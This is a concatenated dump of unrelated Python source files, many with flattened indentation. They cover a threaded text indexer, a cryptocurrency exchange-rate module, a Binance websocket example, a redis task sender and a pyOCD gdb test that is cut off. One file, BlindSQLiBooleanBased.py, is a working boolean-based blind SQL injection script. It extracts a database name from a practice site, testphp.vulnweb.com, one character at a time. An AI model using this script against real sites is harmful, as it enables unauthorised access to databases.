            return doc_list if count is None else doc_list[:count]
        # Only read the document text back from disk when the caller asked for it.
        return_doc_list = [doc + (self._text_from_file(doc[0]),) for doc in doc_list]
        return return_doc_list if count is None else return_doc_list[:count]
def _text_from_file(self, path):
with open(path) as f:
return f.read()
def bulk_index(self, doc_list, threads):
for txt_item in doc_list:
self.print('%s was added to queue' % txt_item[0])
self._index_queue.put(txt_item)
thread_list = []
#self.print(threads)
for i in range(threads):
th = threading.Thread(target=self._index_worker)
th.start()
thread_list.append(th)
for th in thread_list:
th.join()
def _index_worker(self):
while True:
try:
doc_id, content = self._index_queue.get(timeout=0.1)
            except queue.Empty:
                # the queue stayed empty for the timeout window; let the worker exit
                return
self.index(doc_id, content)
self.print('%s docs left to process - %s was indexed' % (self._index_queue.qsize(), doc_id))
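# Example (sketch): builds a tiny index from two throwaway files on a couple of worker
# threads and queries it. This assumes the nltk stopwords corpus has already been
# downloaded; the temp-file handling below is illustration only.
if __name__ == '__main__':
    import os, tempfile
    idx = Index()
    docs = []
    for text in ('Threads make indexing of many documents faster.',
                 'An inverted index maps each token to the documents containing it.'):
        fd, path = tempfile.mkstemp(suffix='.txt')
        with os.fdopen(fd, 'w') as f:
            f.write(text)
        docs.append((path, text))
    idx.bulk_index(docs, 2)
    # Each hit is (path, occurrence_count, full_text) because text_ defaults to True.
    print(idx.get_documents_containing_word('index'))
    for path, _ in docs:
        os.remove(path)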
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0,
# Not ISO 4217.
'BTC': 8}
DEFAULT_EXCHANGE = 'CoinMarketCap'
DEFAULT_CCY = 'USD'
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum-bitcoinprivate'}, timeout=10)
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum-bitcoinprivate'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
h['timestamp'] = timestamp
except:
h = None
else:
h = None
if h:
self.history[ccy] = h
self.on_history()
return h
def get_historical_rates_safe(self, ccy, cache_dir):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
h['timestamp'] = time.time()
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
if ccy not in self.history_ccys():
return
h = self.history.get(ccy)
if h is None:
h = self.read_historical_rates(ccy, cache_dir)
if h is None or h['timestamp'] < time.time() - 24*3600:
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.setDaemon(True)
t.start()
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com',
'/indices/local/ticker/BTCP%s' % ccy)
return {ccy: Decimal(json['last'])}
def history_ccys(self):
return ['USD', 'EUR', 'PLN']
def request_history(self, ccy):
history = self.get_json('apiv2.bitcoinaverage.com',
"/indices/local/history/BTCP%s"
"?period=alltime&format=json" % ccy)
return dict([(h['time'][:10], h['average']) for h in history])
class Bittrex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bittrex.com',
'/api/v1.1/public/getticker?market=BTC-BTCP')
quote_currencies = {}
if not json.get('success', False):
return quote_currencies
last = Decimal(json['result']['Last'])
quote_currencies['BTC'] = last
return quote_currencies
class Poloniex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('poloniex.com', '/public?command=returnTicker')
quote_currencies = {}
bitcoinprivate_ticker = json.get('BTC_BTCP')
quote_currencies['BTC'] = Decimal(bitcoinprivate_ticker['last'])
return quote_currencies
class CoinMarketCap(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinmarketcap.com', '/v1/ticker/1437/')
quote_currencies = {}
if not isinstance(json, list):
return quote_currencies
json = json[0]
for ccy, key in [
('USD', 'price_usd'),
]:
quote_currencies[ccy] = Decimal(json[key])
return quote_currencies
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
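# For example (illustration): dictinvert({'CoinMarketCap': ['USD'], 'Bittrex': ['BTC', 'USD']})
# returns {'USD': ['CoinMarketCap', 'Bittrex'], 'BTC': ['Bittrex']}, i.e. currency -> exchanges.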
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
if not os.path.exists(self.cache_dir):
os.mkdir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
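    # For example (illustration): with self.ccy == 'USD' (precision 2),
    # ccy_amount_str(Decimal('1234.567'), True) returns '1,234.57'; with
    # self.ccy == 'JPY' (precision 0) the same amount formats as '1,235'.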
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
            if self.timeout == 0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_history_capital_gains_config(self):
return bool(self.config.get('history_rates_capital_gains', False))
def set_history_capital_gains_config(self, b):
self.config.set_key('history_rates_capital_gains', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", DEFAULT_CCY)
def config_exchange(self):
return self.config.get('use_exchange', DEFAULT_EXCHANGE)
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, Bittrex)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate is None:
return Decimal('NaN')
return Decimal(rate)
def format_amount(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def fiat_value(self, satoshis, rate):
return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)
def value_str(self, satoshis, rate):
return self.format_fiat(self.fiat_value(satoshis, rate))
def format_fiat(self, value):
if value.is_nan():
return _("No data")
return "%s" % (self.ccy_amount_str(value, True))
def history_rate(self, d_t):
if d_t is None:
return Decimal('NaN')
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy, 'NaN')
self.history_used_spot = True
return Decimal(rate)
def historical_value_str(self, satoshis, d_t):
return self.format_fiat(self.historical_value(satoshis, d_t))
def historical_value(self, satoshis, d_t):
return self.fiat_value(satoshis, self.history_rate(d_t))
def timestamp_rate(self, timestamp):
from electrum_bitcoinprivate.util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
BlindSQLiBooleanBased.py
|
import requests
from queue import Queue
from threading import Thread
import threading
from time import sleep
db = []
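# Boolean-based blind SQLi (sketch of the technique): each request appends
# "and substring((<query>), <i>, 1) = 0x<char>" to the vulnerable parameter. If the
# reference string ('Blad3' on the page used here) still shows up in the response,
# the guessed character at position <i> was correct and is appended to `db`.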
def inject_simple(url:str,query:str,queue):
reference = 'Blad3'
for i in range(1, 10):
for j in range(ord('a'), ord('u') + 1):
            montagem = f"{url} and substring( ( {query} ), {i}, 1 ) = {hex(j)} -- -"
print(montagem)
r = requests.get(montagem)
queue.put(r)
            # drain the queue and mark each response as processed
            while queue.qsize() > 0:
                r = queue.get()
                queue.task_done()
html = r.text
if reference in html:
db.append(chr(j))
url = 'http://testphp.vulnweb.com/artists.php?artist=2'
payload = 'database()'
quantidade_de_thread = [ ]
threads = Thread(target=inject_simple, args=(url,payload, Queue()), daemon=True)
threads.start()
quantidade_de_thread.append(threads)
for inciar in quantidade_de_thread:
inciar.join()
name_dba = ''.join(db)
print(f"Banco de dados :===> {name_dba}")
|
example_userdata_stream.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_userdata_stream.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2020, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
else:
print(oldest_stream_data_from_stream_buffer)
# configure api key and secret for binance.com
binance_com_api_key = ""
binance_com_api_secret = ""
# configure api key and secret for binance.je
binance_je_api_key = ""
binance_je_api_secret = ""
# configure api key and secret for binance.us
binance_us_api_key = ""
binance_us_api_secret = ""
# configure api key and secret for binance.com isolated margin
binance_com_iso_api_key = ""
binance_com_iso_api_secret = ""
# create instances of BinanceWebSocketApiManager
binance_com_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com",
throw_exception_if_unrepairable=True)
binance_je_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.je")
binance_us_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.us")
binance_com_isolated_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com-isolated_margin")
# create the userData streams
binance_com_user_data_stream_id = binance_com_websocket_api_manager.create_stream('arr', '!userData',
api_key=binance_com_api_key,
api_secret=binance_com_api_secret)
binance_je_user_data_stream_id = binance_je_websocket_api_manager.create_stream('arr', '!userData',
api_key=binance_je_api_key,
api_secret=binance_je_api_secret)
binance_us_user_data_stream_id = binance_us_websocket_api_manager.create_stream('arr', '!userData',
api_key=binance_us_api_key,
api_secret=binance_us_api_secret)
binance_com_iso_user_data_stream_id = binance_com_isolated_websocket_api_manager.create_stream('arr', '!userData',
symbols="trxbtc",
api_key=binance_com_iso_api_key,
api_secret=binance_com_iso_api_secret)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_com_websocket_api_manager,))
worker_thread.start()
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_je_websocket_api_manager,))
worker_thread.start()
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_us_websocket_api_manager,))
worker_thread.start()
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer,
args=(binance_com_isolated_websocket_api_manager,))
worker_thread.start()
# monitor the streams
while True:
binance_com_isolated_websocket_api_manager.print_stream_info(binance_com_iso_user_data_stream_id)
binance_com_websocket_api_manager.print_summary()
binance_je_websocket_api_manager.print_summary()
binance_us_websocket_api_manager.print_summary()
binance_com_isolated_websocket_api_manager.print_summary()
time.sleep(5)
|
sender.py
|
import redis
import re
import time
import json
import logging
import random
from threading import Thread
from . import defaults
from . import common
from .pipeline import (
from_pipeline,
send_to_pipeline_execute,
)
from .utils import (
checked_order,
check_connect_worker
)
class Sender(common.Initer):
def __init__(self,
rds = redis.StrictRedis(),
):
self.rds = rds
        self.rds.ping() # make sure the redis connection is alive.
self.start_worker = []
@classmethod
def from_settings(cls,**kw):
rds = cls.redis_from_settings(**kw)
        # default settings can also be overridden here
global defaults
for i in kw:
if hasattr(defaults,i):
setattr(defaults,i,kw[i])
return cls(rds=rds)
def process_run(self):
workernum = len(self.start_worker)
if not workernum: return
if self.dumping:
self.dumping_stop = False
            self.dumping_queues = {} # buffers used when dumping realtime data to disk.
self.ntaskstop = 0
def _logger():
while self.keepalive:
runinfo = from_pipeline(self, self.taskid, 'run')
if runinfo and runinfo['piptype'] == 'realtime':
with self.lock:
if runinfo['dumps']:
if self.dumping:
datamsg = json.loads(runinfo['msg'])
table,data = datamsg['table'],json.dumps(datamsg['data'])
if table not in self.dumping_queues:
self.dumping_queues[table] = []
self.dumping_queues[table].append(data)
else:
                            print(runinfo['msg']) # only the realtime output is shown here; the data itself stays in the pipeline.
if self.taskstop and runinfo is None:
with self.lock:
self.ntaskstop += 1
if self.ntaskstop == defaults.VREDIS_SENDER_THREAD_SEND:
self.logstop = True
self.dumping_stop = True
break
def _dumper():
files = {}
while not self.taskstop:
for table in list(self.dumping_queues):
if table not in files:
files[table] = open('%04d%02d%02d-%02d%02d%02d-%s.json'%(time.localtime()[:6] + (table,)), 'w',
encoding='utf-8',
buffering=1024 )
files[table].write('[\n')
while len(self.dumping_queues[table])>1:
files[table].write(self.dumping_queues[table].pop(0) + ',\n')
else:
time.sleep(.15)
for table in list(self.dumping_queues):
if self.dumping_queues[table]:
files[table].write(self.dumping_queues[table].pop(0) + '\n]')
files[table].close()
for _ in range(defaults.VREDIS_SENDER_THREAD_SEND):
Thread(target=_logger).start()
if self.dumping:
Thread(target=_dumper).start()
def process_stop(self):
def log_start():
print('[ use CTRL+PAUSE(win)/ALT+PAUSE(linux) to break ]')
print('[ORDER]:')
print(re.sub('"VREDIS_SCRIPT": "[^\n]+"', '"VREDIS_SCRIPT": "..."',json.dumps(self.order, indent=4)))
assert self.order['order']['settings'] is not None
if 'VREDIS_SCRIPT' in self.order['order']['settings']:
print('[SCRIPT_ENV]:')
print('\n{}'.format(self.order['order']['settings']['VREDIS_SCRIPT']))
limit = self.order['order']['settings']['VREDIS_LIMIT_LOG_WORKER_NUM'] if 'VREDIS_LIMIT_LOG_WORKER_NUM' \
in self.order['order']['settings'] else defaults.VREDIS_LIMIT_LOG_WORKER_NUM
print('[TASK]:')
t = ['taskid:{}'.format(self.taskid),'receive worker num:{}'.format(self.pubnum)]
if limit < self.pubnum:
                t.append(' <over VREDIS_LIMIT_LOG_WORKER_NUM:{}; worker list truncated.>'.format(limit))
                t.append(' <use the from_settings function to raise VREDIS_LIMIT_LOG_WORKER_NUM and see more.>')
T = True
for idx,info in enumerate(self.start_worker):
if T and idx >= limit:
T = False
                    t.append('start workerid: ...') # worker ids beyond the display limit are not shown.
if T: t.append('start workerid:{}'.format(info['workerid']))
print(json.dumps(t, indent=4))
if self.loginfo: log_start()
        workerids = [i['workerid'] for i in self.start_worker.copy()]
workeridd = {i['workerid']:i['plus'] for i in self.start_worker.copy()}
while self.keepalive and not self.taskstop:
stopinfo = from_pipeline(self, self.taskid, 'stop')
if stopinfo and 'taskid' in stopinfo:
workerids.remove(stopinfo['workerid'])
elif not workerids:
self.taskstop = True
else:
for workerid in workerids:
if not check_connect_worker(self.rds, workerid, workeridd):
t = True
                        # Push the contents of the crashed worker's cache back onto the target task
                        # queue. The worker side does the same cleanup, but there it is hooked to task
                        # completion to avoid a flood of signals.
_rname = '{}:{}'.format(defaults.VREDIS_TASK, self.taskid)
_cname = '{}:{}:{}'.format(defaults.VREDIS_TASK_CACHE, self.taskid, workerid)
while self.rds.llen(_cname) != 0:
t = False
self.rds.brpoplpush(_cname, _rname, defaults.VREDIS_TASK_TIMEOUT)
if t:
print('unknown crash error stop workerid:{}'.format(workerid))
workerids.remove(workerid)
    # status write-backs are received through a queue
def send_status(self):
start_worker = []
for _ in range(self.pubnum):
worker = from_pipeline(self, self.taskid, 'start')
if worker:
if worker['msg'] is None:
start_worker.append(worker)
else:
                    # if msg carries data during the start phase, the worker failed to start; just report the error.
print(worker['msg'])
self.start_worker = start_worker
hookcrash = {i['workerid']:i['plus'] for i in self.start_worker.copy()}
self.rds.hset(defaults.VREDIS_SENDER, '{}@hookcrash'.format(self.taskid), json.dumps(hookcrash))
if self.start_worker:
            self.start() # in debug mode two extra threads are started to keep log output in sync
else:
self.logstop = True
print('none worker receive task.')
def get_taskid(self):
self.taskid = self.taskid if hasattr(self,'taskid') else \
self.rds.hincrby(defaults.VREDIS_SENDER,defaults.VREDIS_SENDER_ID)
return self.taskid
def send(self, input_order, loginfo=True, keepalive=True, dumping=False):
self.taskstop = False
        self.logstop = False # used by the cmdline front end as a hook for the end of command output
self.loginfo = loginfo
self.keepalive = keepalive
self.dumping = dumping
def wait_connect_pub_sender(self):
rname = '{}:{}'.format(defaults.VREDIS_PUBLISH_SENDER, self.taskid)
cursub = self.rds.pubsub_numsub(rname)[0][1]
self.pub = self.rds.pubsub()
self.pub.subscribe(rname)
while self.rds.pubsub_numsub(rname)[0][1] == cursub:
time.sleep(.15)
            self.pubn = int(self.rds.pubsub_numsub(rname)[0][1]) # due to a quirk in redis itself this is not necessarily 1, so it has to be passed along.
self.rds.hset(defaults.VREDIS_WORKER, '{}@inter'.format(self.taskid), 1)
        # get the task id and broadcast it; each Sender object keeps a single taskid
self.get_taskid()
        wait_connect_pub_sender(self) # wait for the self-subscription to open before sending, so workers can detect any kind of sender disconnect
self.order = {'taskid':self.taskid, 'order':{**checked_order(input_order),**{'sender_pubn':self.pubn}}}
self.pubnum = self.rds.publish(defaults.VREDIS_PUBLISH_WORKER, json.dumps(self.order))
self.send_status()
return self.taskid
def send_execute(self, taskid, function_name, args, kwargs, plus, keepalive=True):
if not keepalive:
send_to_pipeline_execute(self, taskid, function_name, args, kwargs, plus)
elif self.start_worker:
send_to_pipeline_execute(self, taskid, function_name, args, kwargs, plus)
def get_stat(self, taskid):
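        # Returns per-worker counters plus an aggregate, roughly:
        # {<workerid>: {'collection': .., 'execute': .., 'fail': .., 'stop': ..},
        #  'all': {'collection': .., 'execute': .., 'fail': .., 'tasknum': ..}}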
workeridd = self.rds.hget(defaults.VREDIS_SENDER, '{}@hookcrash'.format(taskid))
if workeridd is not None:
workeridd = json.loads(workeridd)
d = {}
collection = 0
execute = 0
fail = 0
rname = '{}:{}'.format(defaults.VREDIS_TASK, taskid)
for workerid in workeridd:
_name = '{}:{}:{}'.format(defaults.VREDIS_TASK_STATE, taskid, workerid)
t = {}
_collection = int(self.rds.hget(_name, 'collection') or 0)
_execute = int(self.rds.hget(_name, 'execute') or 0)
_fail = int(self.rds.hget(_name, 'fail') or 0)
_stop = int(self.rds.hget(_name, 'stop') or 0)
t['collection'] = _collection
t['execute'] = _execute
t['fail'] = _fail
t['stop'] = _stop
d[workerid] = t
collection += _collection
execute += _execute
fail += _fail
d['all'] = {'collection':collection,'execute':execute,'fail':fail,'tasknum':self.rds.llen(rname)}
return d
|
gdb_test.py
|
# pyOCD debugger
# Copyright (c) 2015-2020 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
# Note
# To run this script GNU Tools ARM Embedded must be installed,
# along with python for the same architecture. The program
# "arm-none-eabi-gdb-py.exe" requires python for the same
# architecture (x86 or 64) to work correctly. Also, on windows
# the GNU Tools ARM Embedded bin directory needs to be added to
# your path.
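#
# For example (assuming a supported board is attached and "arm-none-eabi-gdb-py"
# is on PATH), the test can be run standalone with:
#
#   python gdb_test.py --debug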
import os
import json
import sys
from subprocess import (
Popen,
STDOUT,
PIPE,
check_output,
)
import argparse
import logging
import traceback
import threading
from pyocd.__main__ import PyOCDTool
from pyocd.core.helpers import ConnectHelper
from pyocd.utility.compatibility import to_str_safe
from pyocd.core.memory_map import MemoryType
from pyocd.flash.file_programmer import FileProgrammer
from test_util import (
Test,
TestResult,
get_session_options,
get_target_test_params,
binary_to_elf_file,
get_env_file_name,
get_test_binary_path,
TEST_DIR,
TEST_OUTPUT_DIR,
ensure_output_dir,
wait_with_deadline,
)
# TODO, c1728p9 - run script several times
# with different command line parameters
LOG = logging.getLogger(__name__)
PYTHON_GDB = "arm-none-eabi-gdb-py"
TEST_TIMEOUT_SECONDS = 60.0 * 5
GDB_SCRIPT_PATH = os.path.join(TEST_DIR, "gdb_test_script.py")
class GdbTestResult(TestResult):
def __init__(self):
super(self.__class__, self).__init__(None, None, None)
self.name = "gdbserver"
class GdbTest(Test):
def __init__(self):
super(self.__class__, self).__init__("Gdb Test", test_gdb)
def run(self, board):
try:
result = self.test_function(board.unique_id, self.n)
except Exception as e:
result = GdbTestResult()
result.passed = False
print("Exception %s when testing board %s" %
(e, board.unique_id))
traceback.print_exc(file=sys.stdout)
result.board = board
result.test = self
return result
TEST_RESULT_KEYS = [
"breakpoint_count",
"watchpoint_count",
"step_time_si",
"step_time_s",
"step_time_n",
"fail_count",
]
def test_gdb(board_id=None, n=0):
temp_test_elf_name = None
result = GdbTestResult()
with ConnectHelper.session_with_chosen_probe(unique_id=board_id, **get_session_options()) as session:
board = session.board
memory_map = board.target.get_memory_map()
ram_region = memory_map.get_default_region_of_type(MemoryType.RAM)
rom_region = memory_map.get_boot_memory()
target_type = board.target_type
binary_file = get_test_binary_path(board.test_binary)
if board_id is None:
board_id = board.unique_id
target_test_params = get_target_test_params(session)
test_port = 3333 + n
telnet_port = 4444 + n
# Hardware breakpoints are not supported above 0x20000000 on
# Cortex-M devices with FPB revision 1.
fpb = session.target.selected_core.fpb
assert fpb is not None
ignore_hw_bkpt_result = int(fpb.revision == 1 and ram_region.start >= 0x20000000)
# Program with initial test image
FileProgrammer(session).program(binary_file, base_address=rom_region.start)
# Generate an elf from the binary test file.
temp_test_elf_name = binary_to_elf_file(binary_file, rom_region.start)
# Write out the test configuration
test_params = {
"test_port" : test_port,
"rom_start" : rom_region.start,
"rom_length" : rom_region.length,
"ram_start" : ram_region.start,
"ram_length" : ram_region.length,
"invalid_start" : 0x3E000000,
"invalid_length" : 0x1000,
"expect_error_on_invalid_access" : target_test_params['error_on_invalid_access'],
"ignore_hw_bkpt_result" : ignore_hw_bkpt_result,
"test_elf" : temp_test_elf_name,
}
test_param_filename = os.path.join(TEST_OUTPUT_DIR, "gdb_test_params%s_%d.txt" % (get_env_file_name(), n))
with open(test_param_filename, "w") as f:
f.write(json.dumps(test_params))
# Remove result from previous run.
test_result_filename = os.path.join(TEST_OUTPUT_DIR, "gdb_test_results%s_%d.txt" % (get_env_file_name(), n))
if os.path.exists(test_result_filename):
os.remove(test_result_filename)
# Run the test
gdb_args = [PYTHON_GDB, "--nh", "-ex", "set $testn=%d" % n, "--command=%s" % GDB_SCRIPT_PATH]
gdb_output_filename = os.path.join(TEST_OUTPUT_DIR, "gdb_output%s_%s_%d.txt" % (get_env_file_name(), board.target_type, n))
with open(gdb_output_filename, "w") as f:
LOG.info('Starting gdb (stdout -> %s): %s', gdb_output_filename, ' '.join(gdb_args))
gdb_program = Popen(gdb_args, stdin=PIPE, stdout=f, stderr=STDOUT)
server_args = ['gdbserver',
'--port=%i' % test_port,
"--telnet-port=%i" % telnet_port,
"--frequency=%i" % target_test_params['test_clock'],
"--uid=%s" % board_id,
]
server = PyOCDTool()
LOG.info('Starting gdbserver: %s', ' '.join(server_args))
server_thread = threading.Thread(target=server.run, args=[server_args])
server_thread.daemon = True
server_thread.start()
LOG.info('Waiting for gdb to finish...')
did_complete = wait_with_deadline(gdb_program, TEST_TIMEOUT_SECONDS)
LOG.info('Waiting for server to finish...')
server_thread.join(timeout=TEST_TIMEOUT_SECONDS)
if not did_complete:
LOG.error("Test timed out!")
if server_thread.is_alive():
LOG.error('Server is still running!')
try:
with open(gdb_output_filename, 'r') as f:
LOG.debug('Gdb output:\n%s', f.read())
except IOError:
pass
# Read back the result
result.passed = False
if did_complete:
try:
with open(test_result_filename, "r") as f:
test_result = json.loads(f.read())
# Print results
if set(TEST_RESULT_KEYS).issubset(test_result):
print("----------------Test Results----------------")
print("HW breakpoint count: %s" % test_result["breakpoint_count"])
print("Watchpoint count: %s" % test_result["watchpoint_count"])
print("Average instruction step time: %s" %
test_result["step_time_si"])
